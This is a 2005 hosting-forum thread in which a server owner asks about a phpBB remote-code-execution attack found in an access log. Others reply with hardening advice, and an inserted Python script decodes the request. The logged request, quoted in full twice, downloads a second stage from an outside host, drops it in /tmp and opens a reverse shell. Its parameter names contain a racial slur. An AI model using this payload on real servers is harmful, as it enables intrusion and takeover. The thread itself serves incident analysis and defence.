  1. #1

    Anyone know what this remote root exploit does?

    I found the following in my access_log:

    202.84.223.166 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d6510099c6293d5c50bcabefa76b6c46&niggaip=203.81.202.65&niggaport=6432&nigga=$a=fopen(\"http://www.pakhackers.com/pgc\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.0" 200 3941

    This is a remote code execution exploit. It took over the userid running the http server. From there, it somehow got into root and executed "find /home/ -name index.* -exec cp /home/index.php".

    Does anyone have information on this hack and everything it may have done to my system, especially what local root vulnerability it exploited?
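To see what that request actually asks the server to do, here is an added example (my code, not anything from the thread or from phpBB) that parses the access_log line as Apache wrote it, URL-decodes the query string, and pulls the payload's stages back out: the `../` traversal in `install_to`, the second stage fetched over HTTP, the file dropped and chmod'ed in /tmp, and the command handed to `system()`, with the `$_REQUEST[...]` lookups resolved against the same request the way PHP would. The log line is copied from the post as constructed input (the attacker's parameter names are kept verbatim only because the decoder has to match them); the labels on the findings are mine. The only assumption is that the vulnerable script interpolates that parameter into PHP it then runs, which is what the payload is written for.

```python
import re
from urllib.parse import unquote

# Constructed copy of the access_log line from the post: the request field
# exactly as mod_log_config wrote it, with " escaped as \" inside it.
SAMPLE_LOG = (
    r'202.84.223.166 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php'
    r'?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp'
    r'&sid=d6510099c6293d5c50bcabefa76b6c46&niggaip=203.81.202.65&niggaport=6432'
    r'&nigga=$a=fopen(\"http://www.pakhackers.com/pgc\",\"r\");$b=\"\";'
    r'while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);'
    r'$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);'
    r'chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip]'
    r'.\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.0" 200 3941'
)

# Apache common log format: client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)\s*$'
)

# PHP fragments that have no business appearing inside a query-string value.
PHP_MARKERS = ("fopen(", "fwrite(", "fclose(", "chmod(", "system(", "$_REQUEST")


def parse_query(query):
    """Split a query string into a dict, decoding %XX escapes.

    Done by hand rather than with urllib.parse.parse_qs because older
    parse_qs versions also split on ';', which this payload is full of.
    """
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def php_concat(expr, params):
    """Evaluate the subset of PHP the payload uses in its system() argument:
    string literals concatenated with $_REQUEST[name] lookups, resolved
    against the same request, as PHP would do."""
    out = []
    for literal, name in re.findall(r'"([^"]*)"|\$_REQUEST\[(\w+)\]', expr):
        out.append(literal if literal else params.get(name, ""))
    return "".join(out)


def analyse_log_line(line):
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("not an Apache access_log line")
    # mod_log_config writes a literal " inside the request field as \"; undo that.
    request = m.group("request").replace('\\"', '"')
    method, _, rest = request.partition(" ")
    uri, _, _proto = rest.rpartition(" ")
    path, _, query = uri.partition("?")
    params = parse_query(query)

    # 1. A path parameter stuffed with ../ to escape the directory the script
    #    meant to write into (here it ends up in /tmp).
    traversal = sorted(k for k, v in params.items() if "../" in v)
    # 2. Parameters that carry PHP source rather than data.
    code_params = {k: v for k, v in params.items()
                   if any(mark in v for mark in PHP_MARKERS)}
    code = "\n".join(code_params.values())
    # 3. Second stage pulled from a remote host over HTTP.
    urls = re.findall(r'https?://[^"\'\s)]+', code)
    # 4. Where it is written, and whether it is made executable.
    dropped = re.findall(r'fopen\("([^"]+)","w"\)', code)
    chmods = re.findall(r'chmod\("([^"]+)",(0?[0-7]{3,4})\)', code)
    # 5. The command line actually handed to system().
    commands = [php_concat(arg, params)
                for arg in re.findall(r'system\((.*?)\);', code)]
    return {
        "client": m.group("client"),
        "time": m.group("ts"),
        "method": method,
        "path": path,
        "status": m.group("status"),
        "traversal_params": traversal,
        "code_params": sorted(code_params),
        "download_urls": urls,
        "dropped_files": dropped,
        "chmod": chmods,
        "commands": commands,
        # "-e /bin/sh" is the netcat-style back-connect option: the dropped
        # binary dials out and attaches a shell to the connection.
        "reverse_shell": any("-e /bin/sh" in c for c in commands),
    }


if __name__ == "__main__":
    for key, value in analyse_log_line(SAMPLE_LOG).items():
        print(f"{key:>17}: {value}")
```

The decoded command is `/tmp/.sesss_ 203.81.202.65 6432 -e /bin/sh`: the downloaded binary is run as the web-server user and told to connect back to 203.81.202.65 port 6432 with a shell attached, and that host is not the 202.84.223.166 that sent the request. Everything this line shows happens as the user Apache runs as; the later root activity the thread describes is not in this request and has to be found elsewhere. Mounting /tmp noexec would have stopped `/tmp/.sesss_` from being executed directly, but not a second stage that is fed to an interpreter instead.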

  2. #2
    Yikes. Think I'll hard-code carriage returns for readability.

    Looks to me like it had php create a file in the /tmp folder and
    execute it. There's much more than that, but it probably
    could've been prevented by having /tmp mounted as noexec.
    Also there is a relative path vulnerability on your server.
    That "../../../" etc. should've been booted by Apache.
    What version of Apache are you running? Check your
    distro's errata / security updates to see if there is a newer
    version available.

    (insert usual cleaning up after being broken into advice here)

    EDIT: I take back the relative path vulnerability thing.
    That's your PHP script that used that, not Apache. The
    script and/or PHP need to be hardened in addition to mounting
    /tmp as noexec.
    Last edited by BigMoneyJim; 05-18-2005 at 08:27 PM.

  3. #3
    it's a phpbb exploit... or related to it at least

  4. #4
    What kernel are you running? That would help track the exploit down a little. Also, are you sure that root was gained? Using nobody to launch the scripts is a fairly normal attack.

    That is just a run of the mill phpbb error, a hardened system with tweaked chmods on system files and a reasonable mod_security configuration could have prevented this.
    John W, CISSP, C|EH
    MS Information Security and Assurance

  5. #5
    Yes, root was gained because I saw root executing the command "find /home/ -name index.* -exec cp /home/index.php" in ps, and it defaced all my index pages. They probably gained control of the web server user through phpBB and then from there used some local root exploit.

    My kernel is 2.4.20-18.7

  6. #6
    That sure is an old kernel. I would get the os reloaded to a newer os such as centos 3.4 and then secure the server / php scripts running on the server.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
